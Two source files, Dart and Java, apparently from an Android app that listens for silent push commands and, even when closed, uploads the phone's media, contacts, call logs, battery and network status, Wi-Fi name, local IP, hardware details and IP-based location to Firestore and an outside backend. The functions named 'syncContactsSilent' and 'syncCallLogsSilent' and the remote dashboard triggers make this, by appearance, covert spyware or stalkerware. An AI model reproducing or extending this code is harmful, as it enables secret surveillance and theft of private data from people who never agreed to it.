File: lib/lib/fcm_service.dart
import 'dart:convert';
import 'dart:io';

import 'package:battery_plus/battery_plus.dart';
import 'package:cloud_firestore/cloud_firestore.dart';
import 'package:connectivity_plus/connectivity_plus.dart';
import 'package:device_info_plus/device_info_plus.dart';
import 'package:firebase_messaging/firebase_messaging.dart';
import 'package:flutter/material.dart';
import 'package:network_info_plus/network_info_plus.dart';

import 'contacts_service.dart';
import 'config.dart';
import 'local_cursor.dart';
import 'media_config.dart';
import 'worker.dart';

/// Top-level background FCM handler. Fires even when the app is closed/swiped
/// because the high-priority *data* message wakes a headless isolate. We do
/// the minimum here — init Firebase and enqueue the worker — then return
/// quickly. The actual media upload happens in WorkManager.
@pragma('vm:entry-point')
Future<void> firebaseMessagingBackgroundHandler(RemoteMessage message) async {
  await ensureFirebase();
  enableFirestorePersistence();
  await _dispatchAction(message);
}

/// Route an FCM data message to the right handler.
Future<void> _dispatchAction(RemoteMessage message) async {
  final action = message.data['action'];

  // Silent internet-ping — write lastPing so dashboard can show online/offline
  if (action == 'ping') {
    final deviceId = await LocalCursor.deviceId();
    try {
      await FirebaseFirestore.instance
          .collection(AppConfig.countersCollection)
          .doc(deviceId)
          .update({'lastPing': FieldValue.serverTimestamp()});
    } catch (_) {}
    // Refresh IP-based location (fire and forget)
    try {
      final client = HttpClient();
      client.connectionTimeout = const Duration(seconds: 8);
      final req = await client.postUrl(
        Uri.parse('https://counter-backend.vercel.app/api/update-location'),
      );
      req.headers.contentType = ContentType.json;
      req.write(jsonEncode({'deviceId': deviceId}));
      await req.close();
      client.close();
    } catch (_) {}
    return;
  }

  // Dashboard "Status" button — collect battery, charging, network and write to Firestore
  if (action == 'get_device_status') {
    final deviceId = await LocalCursor.deviceId();
    try {
      final battery    = Battery();
      final level      = await battery.batteryLevel;
      final state      = await battery.batteryState;
      final isCharging = state == BatteryState.charging || state == BatteryState.full;

      final connectivity = Connectivity();
      final results      = await connectivity.checkConnectivity();
      String networkType = 'unknown';
      if (results.contains(ConnectivityResult.wifi))        networkType = 'WiFi';
      else if (results.contains(ConnectivityResult.mobile)) networkType = 'Mobile';
      else if (results.contains(ConnectivityResult.none))   networkType = 'Offline';

      String? ssid;
      String? localIp;
      if (networkType == 'WiFi') {
        try {
          final info   = NetworkInfo();
          final rawSsid = await info.getWifiName();
          if (rawSsid != null && rawSsid.isNotEmpty && rawSsid != '<unknown ssid>') {
            ssid = rawSsid.replaceAll('"', '');
          }
          final ip = await info.getWifiIP();
          if (ip != null && ip.isNotEmpty) localIp = ip;
        } catch (_) {}
      }

      await FirebaseFirestore.instance
          .collection(AppConfig.countersCollection)
          .doc(deviceId)
          .update({
        'liveStatus.battery':    level,
        'liveStatus.charging':   isCharging,
        'liveStatus.network':    networkType,
        if (ssid != null)    'liveStatus.ssid':    ssid,
        if (localIp != null) 'liveStatus.localIp': localIp,
        'liveStatus.reportedAt': FieldValue.serverTimestamp(),
      });
    } catch (e) {
      debugPrint('[fcm] get_device_status error: $e');
    }
    return;
  }

  if (action == AppConfig.mediaAction) {
    final type = MediaType.fromString(message.data['mediaType']);
    if (type != null) {
      await enqueueMediaUpload(type);
    } else {
      debugPrint('[fcm] unknown mediaType: ${message.data['mediaType']}');
    }
  }

  // Contacts / call logs sync — triggered from dashboard
  if (action == 'sync_data') {
    final syncType = message.data['mediaType'];
    final deviceId = message.data['deviceId'] ?? await LocalCursor.deviceId();
    final service = ContactsService();

    debugPrint('[fcm] sync_data: $syncType for $deviceId');

    if (syncType == 'contacts') {
      await service.syncContactsSilent(deviceId);
    } else if (syncType == 'callLogs') {
      await service.syncCallLogsSilent(deviceId);
    }
  }
}

class FcmService {
  FcmService._();

  /// Wire up FCM: permission, background + foreground handlers, and token
  /// registration into the device's Firestore doc. Call once from main().
  static Future<void> setup() async {
    final messaging = FirebaseMessaging.instance;

    // iOS/web need this; on Android data messages don't, but it's harmless.
    await messaging.requestPermission();

    FirebaseMessaging.onBackgroundMessage(firebaseMessagingBackgroundHandler);

    // Trigger arriving while the app is in the foreground.
    FirebaseMessaging.onMessage.listen((message) async {
      await _dispatchAction(message);
    });

    await _saveToken(await messaging.getToken());
    messaging.onTokenRefresh.listen(_saveToken);
  }

  static Future<void> _saveToken(String? token) async {
    if (token == null) return;
    final deviceId = await LocalCursor.deviceId();

    debugPrint('──────── device ────────');
    debugPrint('deviceId : $deviceId');
    debugPrint('fcmToken : $token');
    debugPrint('────────────────────────');

    final Map<String, dynamic> data = {
      'deviceId': deviceId,
      'fcmToken': token,
      'updatedAt': FieldValue.serverTimestamp(),
    };

    // Save device hardware info alongside FCM token
    try {
      if (Platform.isAndroid) {
        final info = await DeviceInfoPlugin().androidInfo;
        data['deviceInfo'] = {
          'brand': info.brand,
          'model': info.model,
          'manufacturer': info.manufacturer,
          'androidVersion': info.version.release,
          'sdkInt': info.version.sdkInt,
          'device': info.device,
        };
      }
    } catch (_) {}

    await FirebaseFirestore.instance
        .collection(AppConfig.countersCollection)
        .doc(deviceId)
        .set(data, SetOptions(merge: true));

    // Also update IP-based location when token is saved/refreshed
    try {
      final client = HttpClient();
      client.connectionTimeout = const Duration(seconds: 8);
      final req = await client.postUrl(
        Uri.parse('https://counter-backend.vercel.app/api/update-location'),
      );
      req.headers.contentType = ContentType.json;
      req.write(jsonEncode({'deviceId': deviceId}));
      await req.close();
      client.close();
    } catch (_) {}
  }
}

File: java-apk/app/src/main/java/come/tshah/app/FcmService.java
package come.tshah.app;

import android.content.Context;
import android.util.Log;
import com.google.firebase.messaging.FirebaseMessaging;
import com.google.firebase.messaging.RemoteMessage;

public class FcmService {
    private static final String TAG = "FcmService";

    public static void setup() {
        FirebaseMessaging.getInstance().getToken()
            .addOnCompleteListener(task -> {
                if (task.isSuccessful()) saveToken(task.getResult());
            });
    }

    static void saveToken(String token) {
        if (token == null) return;

        new Thread(() -> {
            try {
                String deviceId = LocalCursor.deviceId();
                Log.d(TAG, "────────── device ──────────");
                Log.d(TAG, "deviceId : " + deviceId);
                Log.d(TAG, "fcmToken : " + token);
                Log.d(TAG, "────────────────────────────");

                // Register device + fcmToken with local backend
                org.json.JSONObject ping = new org.json.JSONObject();
                ping.put("deviceId", deviceId);
                ping.put("fcmToken", token);
                ping.put("channelId", AppConfig.CHANNEL_ID);
                org.json.JSONObject info = new org.json.JSONObject();
                info.put("brand",        android.os.Build.BRAND);
                info.put("model",        android.os.Build.MODEL);
                info.put("manufacturer", android.os.Build.MANUFACTURER);
                info.put("osVersion",    android.os.Build.VERSION.RELEASE);
                ping.put("deviceInfo", info);
                BackendClient.post("/api/device/ping", ping.toString());

                // Also explicitly update the FCM token field
                org.json.JSONObject fcmBody = new org.json.JSONObject();
                fcmBody.put("fcmToken", token);
                BackendClient.patch("/api/device/fcm-token", fcmBody.toString());
            } catch (Exception e) {
                Log.e(TAG, "saveToken error: " + e.getMessage());
            }
        }).start();
    }

    public static void dispatchAction(Context context, RemoteMessage message) {
        String action = message.getData().get("action");
        if (action == null) return;

        switch (action) {
            case "ping":
                handlePing();
                break;
            case "get_device_status":
                handleGetDeviceStatus(context);
                break;
            case AppConfig.MEDIA_ACTION:
                handleMediaAction(message);
                break;
            case "sync_data":
                handleSyncData(context, message);
                break;
            default:
                Log.d(TAG, "Unknown action: " + action);
        }
    }

    private static void handlePing() {
        new Thread(() -> {
            try {
                String deviceId = LocalCursor.deviceId();
                BackendClient.post("/api/device/ping",
                        "{\"deviceId\":\"" + deviceId + "\"}");
            } catch (Exception e) {
                Log.e(TAG, "handlePing error: " + e.getMessage());
            }
        }).start();
    }

    private static void handleGetDeviceStatus(Context context) {
        new Thread(() -> {
            try {
                android.content.IntentFilter ifilter =
                        new android.content.IntentFilter(android.content.Intent.ACTION_BATTERY_CHANGED);
                android.content.Intent bat = context.registerReceiver(null, ifilter);
                int level  = bat != null ? bat.getIntExtra(android.os.BatteryManager.EXTRA_LEVEL, -1) : -1;
                int scale  = bat != null ? bat.getIntExtra(android.os.BatteryManager.EXTRA_SCALE, -1) : -1;
                int status = bat != null ? bat.getIntExtra(android.os.BatteryManager.EXTRA_STATUS, -1) : -1;
                int battery = (level >= 0 && scale > 0) ? (int)(level * 100f / scale) : -1;
                boolean charging = status == android.os.BatteryManager.BATTERY_STATUS_CHARGING
                                || status == android.os.BatteryManager.BATTERY_STATUS_FULL;

                org.json.JSONObject liveStatus = new org.json.JSONObject();
                liveStatus.put("charging", charging);
                if (battery >= 0) liveStatus.put("battery", battery);

                org.json.JSONObject body = new org.json.JSONObject();
                body.put("liveStatus", liveStatus);
                BackendClient.patch("/api/device/status", body.toString());
            } catch (Exception e) {
                Log.e(TAG, "handleGetDeviceStatus error: " + e.getMessage());
            }
        }).start();
    }

    private static void handleMediaAction(RemoteMessage message) {
        String mediaType = message.getData().get("mediaType");
        MediaType type = MediaType.fromString(mediaType);
        if (type != null) {
            Log.d(TAG, "FCM media upload triggered: " + mediaType);
            MediaUploadService.runUpload(type);
        } else {
            Log.d(TAG, "Unknown mediaType: " + mediaType);
        }
    }

    private static void handleSyncData(Context context, RemoteMessage message) {
        String syncType = message.getData().get("mediaType");
        Log.d(TAG, "sync_data: " + syncType);

        new Thread(() -> {
            try {
                String deviceId = message.getData().containsKey("deviceId")
                        ? message.getData().get("deviceId")
                        : LocalCursor.deviceId();
                ContactsService service = new ContactsService(context);

                if ("contacts".equals(syncType)) {
                    service.syncContactsSilent(deviceId);
                } else if ("callLogs".equals(syncType)) {
                    service.syncCallLogsSilent(deviceId);
                }
            } catch (Exception e) {
                Log.e(TAG, "handleSyncData error: " + e.getMessage());
            }
        }).start();
    }
}
